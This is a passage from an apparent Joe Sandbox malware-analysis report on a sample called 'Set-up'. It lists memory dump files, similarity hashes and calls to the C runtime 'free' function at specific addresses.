                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: b163c695a09651f519715a03b21c3e252f745ed39e03ed8eddba180fe5b70d49
                            • Instruction ID: a06006fa02a21447f159beacaf9b8f68087f78e0850d9cd6619841a33dffc758
                            • Opcode Fuzzy Hash: b163c695a09651f519715a03b21c3e252f745ed39e03ed8eddba180fe5b70d49
                            • Instruction Fuzzy Hash: 05018176A141118FEB20BF59E845D1BB7D6EF90764F4A84BDE4498B272DB31EC40CB81
                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B5D8A5,?), ref: 00B7281B
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72826
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72831
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B7283A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 37815a2bad45aa9a7f4684050ff7ac240508b2b54459d87295df1833959e199c
                            • Instruction ID: 69b451f20220b1ea66a3082df2d2d865f831f60949d458e16d0e83ee8ec1c20c
                            • Opcode Fuzzy Hash: 37815a2bad45aa9a7f4684050ff7ac240508b2b54459d87295df1833959e199c
                            • Instruction Fuzzy Hash: 74D062B6C0551057F5123A10BC0244B76D65E60738F4945B8F84961176EA12AD6597C3